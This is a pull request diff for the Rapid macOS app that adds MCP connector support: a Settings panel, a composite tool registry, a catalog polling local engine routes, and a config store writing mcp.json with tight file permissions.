### PR TITLE
Wire MCP through to the desktop app (#1716)

### DIFF
--- a/apps/rapid-mac/CHANGELOG.md
+++ b/apps/rapid-mac/CHANGELOG.md
@@ -15,6 +15,19 @@ can actually understand.
 
 ### Added
 
+- **Connectors: give the model tools from MCP servers, from Settings.** A new
+  **Settings → Connectors** panel adds, edits and removes MCP servers, shows
+  whether each one connected — and the reason when it didn't — and lists the
+  tools it exposes with an on/off switch each. The first time the model calls
+  one, Rapid asks: **Allow once / Always allow / Don't allow**, showing which
+  connector it came from and exactly what arguments it was given. "Always
+  allow" applies to that one tool, and every remembered answer can be reviewed
+  and reset. Connectors are off by default, edits apply without restarting the
+  model, and a connector that won't start now reports why instead of taking
+  the whole local server down with it. Previously this was command-line only:
+  you had to hand-write `~/.config/rapid-mlx/mcp.json` and had no way to see
+  what connected or what it was doing.
+
 - **A new Images tab generates pictures on your Mac.** Choose an image model,
   follow the readiness prompt to load it, type a prompt and generate. Each
   render joins a filmstrip below the picture; selecting an earlier one brings

--- a/apps/rapid-mac/Sources/Rapid/Chat/ChatViewModel.swift
+++ b/apps/rapid-mac/Sources/Rapid/Chat/ChatViewModel.swift
@@ -183,6 +183,21 @@ final class ChatViewModel {
         tools.definitions.filter { !disabledTools.contains($0.function.name) }
     }
 
+    /// Just the built-in tools, for Settings → Tools.
+    ///
+    /// Issue #1716: since the registry became a ``CompositeToolRegistry``,
+    /// ``tools/definitions`` also carries connector tools. Those get their own
+    /// switch in Settings → Connectors, backed by a different defaults key
+    /// (``MCPToolRegistry``). Listing them in both panels would give one tool
+    /// two independent off switches — flip the wrong one and the tool stays
+    /// live with no indication why. Each surface owns exactly its own set.
+    ///
+    /// Falls back to the whole registry when it isn't a composite, which is
+    /// what unit tests and the dev-snapshot harness construct.
+    var builtinDefinitions: [ToolDefinition] {
+        (tools as? CompositeToolRegistry)?.builtin.definitions ?? tools.definitions
+    }
+
     // MARK: - Conversation history (M3)
 
     /// Snapshot the active conversation into ``conversations`` + disk. A

--- a/apps/rapid-mac/Sources/Rapid/MCP/CompositeToolRegistry.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/CompositeToolRegistry.swift
@@ -1,0 +1,61 @@
+import Foundation
+import Observation
+
+/// The single ``ToolRegistry`` the chat loop sees, composed of the built-in
+/// tools and whatever MCP connectors are currently up.
+///
+/// Issue #1716 asks that an MCP tool call "render like the built-in tool calls
+/// already do". Composing at the registry boundary is what buys that for free:
+/// ``ChatViewModel`` keeps talking to one registry, ``ChatView`` keeps
+/// rendering `message.toolCalls` generically, and neither learns the word
+/// "MCP".
+///
+/// Dispatch is by ownership, not by name pattern. Matching on the `server__`
+/// shape would misroute the moment a built-in tool is ever named with a double
+/// underscore, and would silently swallow a name neither side owns.
+@MainActor
+@Observable
+final class CompositeToolRegistry: ToolRegistry {
+    let builtin: BuiltinToolRegistry
+    let mcp: MCPToolRegistry
+
+    init(builtin: BuiltinToolRegistry, mcp: MCPToolRegistry) {
+        self.builtin = builtin
+        self.mcp = mcp
+    }
+
+    /// Built-ins first so the stable, always-present tools lead the list the
+    /// model reads, and a flapping connector can't reorder them mid-session.
+    ///
+    /// A connector tool whose name collides with a built-in is DROPPED rather
+    /// than shadowing it: `browse` means the SSRF-guarded, user-approved
+    /// built-in, and a connector that claims the name must not inherit the
+    /// trust the user has already placed in it.
+    var definitions: [ToolDefinition] {
+        let builtinNames = Set(builtin.definitions.map { $0.function.name })
+        return builtin.definitions
+            + mcp.definitions.filter { !builtinNames.contains($0.function.name) }
+    }
+
+    func run(_ call: ToolCall) async -> ToolCallResult {
+        let name = call.function.name
+        if builtin.definitions.contains(where: { $0.function.name == name }) {
+            return await builtin.run(call)
+        }
+        if mcp.catalog.tools.contains(where: { $0.function.name == name }) {
+            return await mcp.run(call)
+        }
+        // Neither side owns it. ``ChatViewModel/toolRefusalMessage`` normally
+        // catches this before dispatch, so reaching here means a non-chat
+        // caller. Answer with the same shape the built-in registry uses — a
+        // recoverable prose nudge — but list the names ACROSS both sides, not
+        // just the built-in three.
+        let available = definitions.map { $0.function.name }.sorted().joined(separator: ", ")
+        return ToolCallResult(
+            toolCallID: call.id,
+            content: "unknown tool '\(name)'\(available.isEmpty ? "" : " — available: \(available)")",
+            isError: true,
+            failureKind: .toolFailed
+        )
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPCatalog.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPCatalog.swift
@@ -91,7 +91,13 @@ final class MCPCatalog {
             return false
         }
         do {
+            // Fetch BOTH routes before publishing anything. Committing the
+            // server rows and then failing the tools fetch would leave the two
+            // inconsistent — new servers advertised alongside a stale tool list
+            // that a reload may have just changed. Build locals, commit as one.
             let serversResponse: ServersResponse = try await get("/v1/mcp/servers", ep)
+            let toolsResponse: ToolsResponse = try await get("/v1/mcp/tools", ep)
+
             servers = serversResponse.servers.map {
                 ServerStatus(
                     name: $0.name,
@@ -103,8 +109,6 @@ final class MCPCatalog {
             }
             subsystemError = serversResponse.error
             isConfigured = serversResponse.configured ?? false
-
-            let toolsResponse: ToolsResponse = try await get("/v1/mcp/tools", ep)
             tools = toolsResponse.tools.map {
                 ToolDefinition(
                     name: $0.name,
@@ -120,7 +124,8 @@ final class MCPCatalog {
             return true
         } catch {
             // Don't wipe the last-known-good list on a transient failure — a
-            // dropped poll shouldn't make every connector row flicker away.
+            // dropped poll shouldn't make every connector row flicker away, and
+            // nothing was committed above, so servers and tools stay in sync.
             // Say we couldn't check instead.
             fetchError = error.localizedDescription
             return false

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPCatalog.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPCatalog.swift
@@ -79,6 +79,17 @@ final class MCPCatalog {
     /// Called when the child goes away. Keeping a stale tool list across a
     /// server stop would let the chat loop advertise — and try to execute —
     /// tools that no process is behind.
+    /// Whether a namespaced tool name is a legal OpenAI function name:
+    /// `[A-Za-z0-9_-]`, 1–64 characters. Names from a connector are arbitrary,
+    /// so this is the gate that keeps an un-emittable name off the tool list.
+    static func isLegalFunctionName(_ name: String) -> Bool {
+        guard !name.isEmpty, name.count <= 64 else { return false }
+        return name.unicodeScalars.allSatisfy {
+            ($0 >= "a" && $0 <= "z") || ($0 >= "A" && $0 <= "Z")
+                || ($0 >= "0" && $0 <= "9") || $0 == "_" || $0 == "-"
+        }
+    }
+
     func clear() {
         // Invalidate any in-flight refresh/reload: without this bump a slow poll
         // that started before the clear could complete last and restore the
@@ -127,11 +138,14 @@ final class MCPCatalog {
             subsystemError = serversResponse.error
             isConfigured = serversResponse.configured ?? false
             // Drop any tool whose namespaced `server__tool` name can't be a
-            // legal OpenAI function name (64 chars). Capping the server half at
-            // 32 doesn't bound a connector's own tool names, and advertising a
+            // legal OpenAI function name — `[A-Za-z0-9_-]`, at most 64 chars.
+            // Capping the server half at 32 bounds neither the length nor the
+            // characters of a connector's own tool names, and advertising a
             // name the model can't emit — or that 400s on the wire — reads as
             // "that tool silently does nothing". Not advertising it is honest.
-            let usableTools = toolsResponse.tools.filter { $0.name.count <= 64 }
+            let usableTools = toolsResponse.tools.filter {
+                MCPCatalog.isLegalFunctionName($0.name)
+            }
             tools = usableTools.map {
                 ToolDefinition(
                     name: $0.name,
@@ -202,7 +216,17 @@ final class MCPCatalog {
         // `true`: if that fetch fails the tool list is the pre-reload one, and
         // a caller told "reload succeeded" would keep advertising tools a
         // reconfigure may have just removed.
-        return await refresh()
+        let refreshed = await refresh()
+        if !refreshed, generation == mutationGeneration {
+            // The engine reloaded (servers committed above) but we couldn't
+            // read the new tool list. Unlike a transient poll failure, a reload
+            // is a known state change — keeping the pre-reload tools would
+            // advertise ones the reconfigure may have removed, so drop them and
+            // let `fetchError` drive a retry rather than showing stale tools.
+            tools = []
+            serverForTool = [:]
+        }
+        return refreshed
     }
 
     // MARK: - Execute

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPCatalog.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPCatalog.swift
@@ -80,6 +80,10 @@ final class MCPCatalog {
     /// server stop would let the chat loop advertise — and try to execute —
     /// tools that no process is behind.
     func clear() {
+        // Invalidate any in-flight refresh/reload: without this bump a slow poll
+        // that started before the clear could complete last and restore the
+        // very servers and tools we are wiping because the child went away.
+        mutationGeneration += 1
         servers = []
         tools = []
         serverForTool = [:]

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPCatalog.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPCatalog.swift
@@ -84,10 +84,11 @@ final class MCPCatalog {
     // MARK: - Refresh
 
     /// Re-read `/v1/mcp/servers` and `/v1/mcp/tools`.
-    func refresh() async {
+    @discardableResult
+    func refresh() async -> Bool {
         guard let ep = endpoint() else {
             clear()
-            return
+            return false
         }
         do {
             let serversResponse: ServersResponse = try await get("/v1/mcp/servers", ep)
@@ -116,11 +117,13 @@ final class MCPCatalog {
                 uniquingKeysWith: { first, _ in first }
             )
             fetchError = nil
+            return true
         } catch {
             // Don't wipe the last-known-good list on a transient failure — a
             // dropped poll shouldn't make every connector row flicker away.
             // Say we couldn't check instead.
             fetchError = error.localizedDescription
+            return false
         }
     }
 
@@ -163,9 +166,11 @@ final class MCPCatalog {
             return false
         }
         // Tools come from the second route; the reload response only carries
-        // server rows.
-        await refresh()
-        return true
+        // server rows. Report the refresh outcome rather than a hardcoded
+        // `true`: if that fetch fails the tool list is the pre-reload one, and
+        // a caller told "reload succeeded" would keep advertising tools a
+        // reconfigure may have just removed.
+        return await refresh()
     }
 
     // MARK: - Execute

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPCatalog.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPCatalog.swift
@@ -1,0 +1,312 @@
+import Foundation
+import Observation
+
+/// Live view of what the engine's MCP subsystem is actually doing.
+///
+/// Issue #1716: the app had no way to see which servers connected, which tools
+/// they exposed, or why one failed. The engine has answered all three
+/// questions over HTTP for a while (`vllm_mlx/routes/mcp_routes.py`); nothing
+/// asked. This polls those routes and republishes the answers as observable
+/// state the Settings panel and the tool registry both read.
+///
+/// Deliberately a *read* model plus one action (``reload``). The engine owns
+/// the connections; this owns nothing but the last thing it was told.
+@MainActor
+@Observable
+final class MCPCatalog {
+    struct ServerStatus: Identifiable, Equatable, Sendable {
+        let name: String
+        /// Engine-side connection state — `connected`, `error`, `disconnected`.
+        let state: String
+        let transport: String
+        let toolsCount: Int
+        let error: String?
+
+        var id: String { name }
+        var isConnected: Bool { state == "connected" }
+    }
+
+    /// Per-server connection rows, including entries the engine's config
+    /// validation rejected outright (those arrive as `state == "error"`).
+    private(set) var servers: [ServerStatus] = []
+
+    /// Every tool the connected servers expose, already in the wire shape the
+    /// chat request body needs. Names are engine-namespaced `server__tool`.
+    private(set) var tools: [ToolDefinition] = []
+
+    /// Which server each tool came from, keyed by tool name. Needed by the
+    /// approval prompt — "run `read_file`?" is not a question a user can
+    /// answer without knowing whose `read_file` it is.
+    private(set) var serverForTool: [String: String] = [:]
+
+    /// Whole-subsystem failure (MCP could not start at all), as opposed to one
+    /// server failing. Comes from the engine's `error` field.
+    private(set) var subsystemError: String?
+
+    /// True once the engine knows about a config path. Distinguishes "the app
+    /// never passed --mcp-config" from "config present but broken".
+    private(set) var isConfigured: Bool = false
+
+    /// Last transport-level failure talking to the engine itself. Separate
+    /// from ``subsystemError``: this one means we don't know the state, rather
+    /// than knowing it's bad.
+    private(set) var fetchError: String?
+
+    private let session: URLSession
+    /// Resolves the live endpoint. A closure rather than a stored host/port
+    /// because both float across a restart (`ServerManager.activePort`
+    /// sweeps 8000–8009 and the bearer rotates every launch), and a snapshot
+    /// taken at construction would be stale by the first refresh.
+    private let endpoint: @MainActor () -> (host: String, port: Int, bearer: String?)?
+
+    init(
+        session: URLSession = .shared,
+        endpoint: @escaping @MainActor () -> (host: String, port: Int, bearer: String?)?
+    ) {
+        self.session = session
+        self.endpoint = endpoint
+    }
+
+    /// Drop everything we believe about the engine's MCP state.
+    ///
+    /// Called when the child goes away. Keeping a stale tool list across a
+    /// server stop would let the chat loop advertise — and try to execute —
+    /// tools that no process is behind.
+    func clear() {
+        servers = []
+        tools = []
+        serverForTool = [:]
+        subsystemError = nil
+        fetchError = nil
+        isConfigured = false
+    }
+
+    // MARK: - Refresh
+
+    /// Re-read `/v1/mcp/servers` and `/v1/mcp/tools`.
+    func refresh() async {
+        guard let ep = endpoint() else {
+            clear()
+            return
+        }
+        do {
+            let serversResponse: ServersResponse = try await get("/v1/mcp/servers", ep)
+            servers = serversResponse.servers.map {
+                ServerStatus(
+                    name: $0.name,
+                    state: $0.state,
+                    transport: $0.transport,
+                    toolsCount: $0.tools_count,
+                    error: $0.error
+                )
+            }
+            subsystemError = serversResponse.error
+            isConfigured = serversResponse.configured ?? false
+
+            let toolsResponse: ToolsResponse = try await get("/v1/mcp/tools", ep)
+            tools = toolsResponse.tools.map {
+                ToolDefinition(
+                    name: $0.name,
+                    description: $0.description,
+                    parameters: $0.parameters ?? .object([:])
+                )
+            }
+            serverForTool = Dictionary(
+                toolsResponse.tools.map { ($0.name, $0.server) },
+                uniquingKeysWith: { first, _ in first }
+            )
+            fetchError = nil
+        } catch {
+            // Don't wipe the last-known-good list on a transient failure — a
+            // dropped poll shouldn't make every connector row flicker away.
+            // Say we couldn't check instead.
+            fetchError = error.localizedDescription
+        }
+    }
+
+    /// Ask the engine to re-read the config file and rebuild its connections,
+    /// then refresh. This is what makes a Settings edit take effect without
+    /// restarting the model (issue #1716 acceptance item 4).
+    ///
+    /// - Returns: `true` when the engine actually picked the change up.
+    ///   `false` means the caller should fall back to telling the user a
+    ///   restart is needed. Two distinct cases produce `false`, and both must:
+    ///   the route failed or is missing (older engine build), OR it answered
+    ///   but reports it has no config path — which is what happens when the
+    ///   running child was spawned before connectors were switched on and so
+    ///   never received `--mcp-config`. That second case returns HTTP 200, so
+    ///   treating "the request succeeded" as "the change applied" would clear
+    ///   the restart banner while the edit sat inert.
+    @discardableResult
+    func reload() async -> Bool {
+        guard let ep = endpoint() else { return false }
+        do {
+            let response: ServersResponse = try await post("/v1/mcp/reload", ep)
+            servers = response.servers.map {
+                ServerStatus(
+                    name: $0.name,
+                    state: $0.state,
+                    transport: $0.transport,
+                    toolsCount: $0.tools_count,
+                    error: $0.error
+                )
+            }
+            subsystemError = response.error
+            // Default true for an engine build that predates the field: it
+            // answered the reload route at all, so it is new enough to have
+            // done the work.
+            isConfigured = response.configured ?? true
+            fetchError = nil
+            if !isConfigured { return false }
+        } catch {
+            fetchError = error.localizedDescription
+            return false
+        }
+        // Tools come from the second route; the reload response only carries
+        // server rows.
+        await refresh()
+        return true
+    }
+
+    // MARK: - Execute
+
+    /// Run one tool through the engine and return its textual result.
+    ///
+    /// The approval decision happens in ``MCPToolRegistry`` before this is
+    /// called — by the time a request reaches here the user has said yes.
+    func execute(toolName: String, argumentsJSON: String) async throws -> ExecuteResponse {
+        guard let ep = endpoint() else { throw CatalogError.serverNotRunning }
+        // Arguments arrive as the model's raw JSON string. Empty means a
+        // no-arg tool, which is legal.
+        let trimmed = argumentsJSON.trimmingCharacters(in: .whitespacesAndNewlines)
+        let argumentsValue: CodableJSON
+        if trimmed.isEmpty {
+            argumentsValue = .object([:])
+        } else {
+            guard let data = trimmed.data(using: .utf8),
+                  let decoded = try? JSONDecoder().decode(CodableJSON.self, from: data),
+                  case .object = decoded else {
+                throw CatalogError.badArguments
+            }
+            argumentsValue = decoded
+        }
+        let body = ExecuteRequest(tool_name: toolName, arguments: argumentsValue)
+        return try await post("/v1/mcp/execute", ep, body: body)
+    }
+
+    enum CatalogError: LocalizedError {
+        case serverNotRunning
+        case badArguments
+        case http(Int)
+
+        var errorDescription: String? {
+            switch self {
+            case .serverNotRunning:
+                return "the local server isn't running"
+            case .badArguments:
+                return "tool arguments must be a JSON object"
+            case .http(let code):
+                return "the local server returned HTTP \(code)"
+            }
+        }
+    }
+
+    // MARK: - Transport
+
+    private typealias Endpoint = (host: String, port: Int, bearer: String?)
+
+    private func request(_ path: String, _ ep: Endpoint) throws -> URLRequest {
+        guard let url = URL(string: "http://\(ep.host):\(ep.port)\(path)") else {
+            throw CatalogError.serverNotRunning
+        }
+        var req = URLRequest(url: url)
+        // Same per-launch bearer the chat stream uses (`ChatStreamClient`).
+        if let bearer = ep.bearer, !bearer.isEmpty {
+            req.setValue("Bearer \(bearer)", forHTTPHeaderField: "Authorization")
+        }
+        req.timeoutInterval = 15
+        return req
+    }
+
+    private func get<T: Decodable>(_ path: String, _ ep: Endpoint) async throws -> T {
+        try await send(try request(path, ep))
+    }
+
+    private func post<T: Decodable>(
+        _ path: String,
+        _ ep: Endpoint,
+        body: (some Encodable)? = Optional<Never>.none
+    ) async throws -> T {
+        var req = try request(path, ep)
+        req.httpMethod = "POST"
+        req.setValue("application/json", forHTTPHeaderField: "Content-Type")
+        if let body {
+            req.httpBody = try JSONEncoder().encode(body)
+        }
+        // A tool can legitimately take a while (a query, a fetch). The engine
+        // applies the per-server timeout from the config; give it room.
+        req.timeoutInterval = 120
+        return try await send(req)
+    }
+
+    private func send<T: Decodable>(_ req: URLRequest) async throws -> T {
+        let (data, response) = try await session.data(for: req)
+        if let http = response as? HTTPURLResponse, !(200..<300).contains(http.statusCode) {
+            throw CatalogError.http(http.statusCode)
+        }
+        return try JSONDecoder().decode(T.self, from: data)
+    }
+
+    // MARK: - Wire shapes (mirror vllm_mlx/api/models.py)
+
+    private struct ServersResponse: Decodable {
+        struct Server: Decodable {
+            let name: String
+            let state: String
+            let transport: String
+            let tools_count: Int
+            let error: String?
+        }
+        let servers: [Server]
+        let error: String?
+        /// Optional so the app keeps working against an engine build that
+        /// predates this field.
+        let configured: Bool?
+    }
+
+    private struct ToolsResponse: Decodable {
+        struct Tool: Decodable {
+            let name: String
+            let description: String
+            let server: String
+            let parameters: CodableJSON?
+        }
+        let tools: [Tool]
+    }
+
+    private struct ExecuteRequest: Encodable {
+        let tool_name: String
+        let arguments: CodableJSON
+    }
+
+    struct ExecuteResponse: Decodable {
+        let tool_name: String
+        let content: CodableJSON?
+        let is_error: Bool
+        let error_message: String?
+
+        /// Flatten the engine's result into the string the model sees.
+        var text: String {
+            if let error_message, is_error { return error_message }
+            guard let content else { return "" }
+            if case .string(let s) = content { return s }
+            let encoder = JSONEncoder()
+            encoder.outputFormatting = [.sortedKeys]
+            if let data = try? encoder.encode(content),
+               let s = String(data: data, encoding: .utf8) {
+                return s
+            }
+            return ""
+        }
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPCatalog.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPCatalog.swift
@@ -52,6 +52,13 @@ final class MCPCatalog {
     /// than knowing it's bad.
     private(set) var fetchError: String?
 
+    /// Bumped at the start of every ``refresh`` / ``reload``. Each run captures
+    /// its value and, after its network awaits, commits only if still current —
+    /// so a slow poll that started before a reload can't complete last and
+    /// restore the tools the reload just removed. `@MainActor` makes the
+    /// bump-and-capture and the compare-and-commit each atomic between awaits.
+    private var mutationGeneration = 0
+
     private let session: URLSession
     /// Resolves the live endpoint. A closure rather than a stored host/port
     /// because both float across a restart (`ServerManager.activePort`
@@ -90,6 +97,8 @@ final class MCPCatalog {
             clear()
             return false
         }
+        mutationGeneration += 1
+        let generation = mutationGeneration
         do {
             // Fetch BOTH routes before publishing anything. Committing the
             // server rows and then failing the tools fetch would leave the two
@@ -97,6 +106,10 @@ final class MCPCatalog {
             // that a reload may have just changed. Build locals, commit as one.
             let serversResponse: ServersResponse = try await get("/v1/mcp/servers", ep)
             let toolsResponse: ToolsResponse = try await get("/v1/mcp/tools", ep)
+
+            // A newer refresh/reload started while we were on the network; its
+            // result is the current truth. Discard ours rather than clobber it.
+            guard generation == mutationGeneration else { return false }
 
             servers = serversResponse.servers.map {
                 ServerStatus(
@@ -109,7 +122,13 @@ final class MCPCatalog {
             }
             subsystemError = serversResponse.error
             isConfigured = serversResponse.configured ?? false
-            tools = toolsResponse.tools.map {
+            // Drop any tool whose namespaced `server__tool` name can't be a
+            // legal OpenAI function name (64 chars). Capping the server half at
+            // 32 doesn't bound a connector's own tool names, and advertising a
+            // name the model can't emit — or that 400s on the wire — reads as
+            // "that tool silently does nothing". Not advertising it is honest.
+            let usableTools = toolsResponse.tools.filter { $0.name.count <= 64 }
+            tools = usableTools.map {
                 ToolDefinition(
                     name: $0.name,
                     description: $0.description,
@@ -117,7 +136,7 @@ final class MCPCatalog {
                 )
             }
             serverForTool = Dictionary(
-                toolsResponse.tools.map { ($0.name, $0.server) },
+                usableTools.map { ($0.name, $0.server) },
                 uniquingKeysWith: { first, _ in first }
             )
             fetchError = nil
@@ -148,8 +167,12 @@ final class MCPCatalog {
     @discardableResult
     func reload() async -> Bool {
         guard let ep = endpoint() else { return false }
+        mutationGeneration += 1
+        let generation = mutationGeneration
         do {
             let response: ServersResponse = try await post("/v1/mcp/reload", ep)
+            // Superseded by a newer mutation while the reload was in flight.
+            guard generation == mutationGeneration else { return false }
             servers = response.servers.map {
                 ServerStatus(
                     name: $0.name,

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPConfigStore.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPConfigStore.swift
@@ -1,0 +1,206 @@
+import Foundation
+import Observation
+
+/// Owns `~/.config/rapid-mlx/mcp.json` — the file the engine reads when the
+/// app passes `--mcp-config` at spawn.
+///
+/// Issue #1716: before this, a desktop user who wanted MCP tools had to
+/// hand-author that file and know it existed. The app never wrote it and never
+/// pointed the engine at it. This store is the write half; ``MCPCatalog`` is
+/// the read-back half.
+///
+/// The file is deliberately the ecosystem-standard shape (`mcpServers` at the
+/// root, the same key Claude Desktop and VS Code use), so a config the user
+/// already has can be dropped in, and one authored here can be lifted out. The
+/// engine accepts both that key and its own historical `servers`
+/// (`vllm_mlx/mcp/config.py: select_server_map`).
+@MainActor
+@Observable
+final class MCPConfigStore {
+    /// Master opt-in. Off means the app does not pass `--mcp-config` at all,
+    /// so the engine starts with no MCP subsystem — not merely with zero
+    /// servers. Connectors run arbitrary local commands; that is an explicit
+    /// choice, not a default.
+    static let enabledKey = "rapid.mcp.connectors.enabled.v1"
+
+    private let defaults: UserDefaults
+    private let fileURL: URL
+
+    /// Servers in file order. Order is preserved on save so a user who opens
+    /// the JSON by hand sees a stable file.
+    private(set) var servers: [MCPServerConfig] = []
+
+    /// Non-nil when the file exists but could not be read or parsed. Surfaced
+    /// in the panel — silently showing an empty list over a broken file is the
+    /// exact "my connectors vanished" failure this feature is fixing.
+    private(set) var loadError: String?
+
+    var isEnabled: Bool {
+        didSet {
+            guard isEnabled != oldValue else { return }
+            defaults.set(isEnabled, forKey: Self.enabledKey)
+        }
+    }
+
+    init(defaults: UserDefaults = .standard, fileURL: URL? = nil) {
+        self.defaults = defaults
+        self.fileURL = fileURL ?? Self.defaultFileURL
+        self.isEnabled = defaults.bool(forKey: Self.enabledKey)
+        load()
+    }
+
+    /// `~/.config/rapid-mlx/mcp.json` — the first entry of the engine's own
+    /// search path (`vllm_mlx/mcp/config.py: CONFIG_SEARCH_PATHS`). Resolved
+    /// from the real home directory rather than `NSHomeDirectory()`, which a
+    /// sandboxed context would redirect into a container the engine child
+    /// would never look in.
+    static var defaultFileURL: URL {
+        let home = FileManager.default.homeDirectoryForCurrentUser
+        return home
+            .appendingPathComponent(".config", isDirectory: true)
+            .appendingPathComponent("rapid-mlx", isDirectory: true)
+            .appendingPathComponent("mcp.json", isDirectory: false)
+    }
+
+    /// Path handed to the engine as `--mcp-config`, or `nil` when there is
+    /// nothing worth starting the MCP subsystem for.
+    ///
+    /// Returning `nil` for "enabled but no servers" is deliberate: passing a
+    /// config with an empty `mcpServers` map makes the engine stand up a
+    /// manager, connect to nothing, and report an MCP subsystem the user has
+    /// no reason to see.
+    var launchConfigPath: String? {
+        guard isEnabled else { return nil }
+        guard servers.contains(where: { $0.enabled }) else { return nil }
+        guard FileManager.default.fileExists(atPath: fileURL.path) else { return nil }
+        return fileURL.path
+    }
+
+    // MARK: - Read
+
+    func load() {
+        loadError = nil
+        guard FileManager.default.fileExists(atPath: fileURL.path) else {
+            servers = []
+            return
+        }
+        do {
+            let data = try Data(contentsOf: fileURL)
+            servers = try Self.decode(data)
+        } catch {
+            servers = []
+            loadError = "Couldn't read \(fileURL.path): \(error.localizedDescription)"
+        }
+    }
+
+    /// Parse the `mcpServers` map into an ordered array, reattaching each map
+    /// key as the entry's `name`.
+    ///
+    /// `static` + `Data`-in so the round-trip can be tested without touching
+    /// the user's real config directory.
+    static func decode(_ data: Data) throws -> [MCPServerConfig] {
+        let root = try JSONDecoder().decode(Root.self, from: data)
+        let map = root.mcpServers ?? root.servers ?? [:]
+        return map
+            .map { name, entry -> MCPServerConfig in
+                var entry = entry
+                entry.name = name
+                return entry
+            }
+            // The JSON object is unordered, so sort by name for a stable list.
+            // Without this the Settings rows reshuffle on every load.
+            .sorted { $0.name.localizedStandardCompare($1.name) == .orderedAscending }
+    }
+
+    static func encode(_ servers: [MCPServerConfig]) throws -> Data {
+        var map: [String: MCPServerConfig] = [:]
+        for server in servers { map[server.name] = server }
+        let encoder = JSONEncoder()
+        encoder.outputFormatting = [.prettyPrinted, .sortedKeys]
+        return try encoder.encode(Root(mcpServers: map, servers: nil))
+    }
+
+    private struct Root: Codable {
+        var mcpServers: [String: MCPServerConfig]?
+        /// The engine's historical key. Read for back-compat with a config a
+        /// user wrote against an older guide; never written.
+        var servers: [String: MCPServerConfig]?
+    }
+
+    // MARK: - Write
+
+    enum SaveError: LocalizedError {
+        case invalid(String)
+        case duplicateName(String)
+        case io(String)
+
+        var errorDescription: String? {
+            switch self {
+            case .invalid(let why):      return why
+            case .duplicateName(let n):  return "A connector named “\(n)” already exists."
+            case .io(let why):           return why
+            }
+        }
+    }
+
+    /// Insert or replace one server and persist.
+    ///
+    /// - Parameter replacing: the name being edited, when this is an edit
+    ///   rather than an add. Passing it lets a rename land without tripping
+    ///   the duplicate check against the entry's own old name.
+    func upsert(_ server: MCPServerConfig, replacing originalName: String? = nil) throws {
+        if let why = server.validationError { throw SaveError.invalid(why) }
+        if servers.contains(where: { $0.name == server.name && $0.name != originalName }) {
+            throw SaveError.duplicateName(server.name)
+        }
+        var next = servers
+        if let originalName, let idx = next.firstIndex(where: { $0.name == originalName }) {
+            next[idx] = server
+        } else {
+            next.append(server)
+        }
+        try persist(next)
+    }
+
+    func remove(named name: String) throws {
+        try persist(servers.filter { $0.name != name })
+    }
+
+    func setServerEnabled(_ name: String, _ enabled: Bool) throws {
+        var next = servers
+        guard let idx = next.firstIndex(where: { $0.name == name }) else { return }
+        next[idx].enabled = enabled
+        try persist(next)
+    }
+
+    private func persist(_ next: [MCPServerConfig]) throws {
+        let sorted = next.sorted {
+            $0.name.localizedStandardCompare($1.name) == .orderedAscending
+        }
+        do {
+            let data = try Self.encode(sorted)
+            let dir = fileURL.deletingLastPathComponent()
+            try FileManager.default.createDirectory(
+                at: dir,
+                withIntermediateDirectories: true,
+                // The directory holds a file naming local commands to run.
+                // 0700 keeps it out of reach of other accounts on a shared Mac.
+                attributes: [.posixPermissions: 0o700]
+            )
+            // Atomic so a crash mid-write can't leave the engine reading a
+            // truncated config on next launch.
+            try data.write(to: fileURL, options: [.atomic])
+            // `.atomic` writes via a temp file and renames, which does NOT
+            // carry permissions across — set them after the rename, every
+            // time, or the mode silently reverts to the default umask.
+            try FileManager.default.setAttributes(
+                [.posixPermissions: 0o600],
+                ofItemAtPath: fileURL.path
+            )
+            servers = sorted
+            loadError = nil
+        } catch {
+            throw SaveError.io("Couldn't save \(fileURL.path): \(error.localizedDescription)")
+        }
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/MCP/MCPConfigStore.swift
+++ b/apps/rapid-mac/Sources/Rapid/MCP/MCPConfigStore.swift
@@ -179,24 +179,29 @@ final class MCPConfigStore {
         // runs — a new command/URL/args/env, or a rename — any "always allow"
         // remembered against the old name must be dropped, or it would silently
         // authorize the replacement. Enable/timeout edits don't change the code
-        // and keep their grants.
+        // and keep their grants. Decide here, but revoke only AFTER the write
+        // is durable: a failed persist must not strand a connector with its
+        // grants deleted.
         var next = servers
+        var reconfiguredServer: String?
         if let originalName, let idx = next.firstIndex(where: { $0.name == originalName }) {
             if next[idx].runsDifferentCode(from: server) || originalName != server.name {
-                onServerReconfigured?(originalName)
+                reconfiguredServer = originalName
             }
             next[idx] = server
         } else {
             next.append(server)
         }
         try persist(next)
+        if let reconfiguredServer { onServerReconfigured?(reconfiguredServer) }
     }
 
     func remove(named name: String) throws {
-        // A removed server's grants are dead keys; drop them so re-adding the
-        // same name later starts from a clean, unapproved slate.
-        onServerReconfigured?(name)
+        // Persist first: a failed removal must not reset consent for a
+        // connector that is still installed. A removed server's grants are dead
+        // keys, so drop them once the removal is durable.
         try persist(servers.filter { $0.name != name })
+        onServerReconfigured?(name)
     }
 
     func setServerEnabled(_ name: String, _ enabled: Bool) throws {
@@ -219,6 +224,14 @@ final class MCPConfigStore {
                 // The directory holds a file naming local commands to run.
                 // 0700 keeps it out of reach of other accounts on a shared Mac.
                 attributes: [.posixPermissions: 0o700]
+            )
+            // createDirectory does NOT tighten an already-existing directory,
+            // so a `~/.config/rapid-mlx` created earlier at the umask default
+            // (e.g. 0755) would leave the 0600-window argument below false.
+            // Set it explicitly, every time — this is what shields the brief
+            // post-rename window where the file still carries the umask mode.
+            try FileManager.default.setAttributes(
+                [.posixPermissions: 0o700], ofItemAtPath: dir.path
             )
             // Atomic so a crash mid-write can't leave the engine reading a
             // truncated config on next launch.

